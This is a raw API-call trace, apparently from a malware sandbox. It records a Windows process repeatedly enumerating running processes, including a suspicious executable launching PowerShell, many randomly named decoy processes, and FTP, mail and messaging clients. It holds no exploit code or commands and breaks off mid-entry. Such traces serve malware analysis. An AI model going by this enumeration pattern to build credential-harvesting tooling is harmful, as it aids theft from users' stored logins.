Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.677] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0259.679] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0259.681] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0259.682] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.684] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0259.686] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0259.688] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0259.689] CloseHandle (hObject=0x2338) returned 1 [0259.689] Sleep (dwMilliseconds=0x64) [0259.729] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0259.742] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.744] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.745] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.747] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.748] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.750] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.796] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.798] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.800] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.801] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.803] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.805] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.806] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.808] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.809] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.811] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.812] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.814] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.815] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.817] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.818] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0259.820] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.821] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0259.830] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.832] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0259.833] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0259.835] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0259.836] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0259.875] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0259.877] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0259.878] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.880] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.881] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0259.883] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.884] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.886] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.888] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0259.889] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0259.890] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0259.892] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0259.894] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0259.896] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0259.897] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0259.899] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0259.900] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0259.902] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0259.903] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0259.905] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0259.906] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0259.908] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0259.909] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0259.941] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0259.943] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0259.945] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0259.946] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0259.948] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0259.949] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0259.951] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0259.953] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0259.954] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0259.957] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0259.959] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0259.960] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0259.962] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0259.966] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0259.968] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0259.970] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0259.972] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0259.974] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0259.975] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0260.002] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0260.004] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0260.006] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0260.008] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0260.010] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, 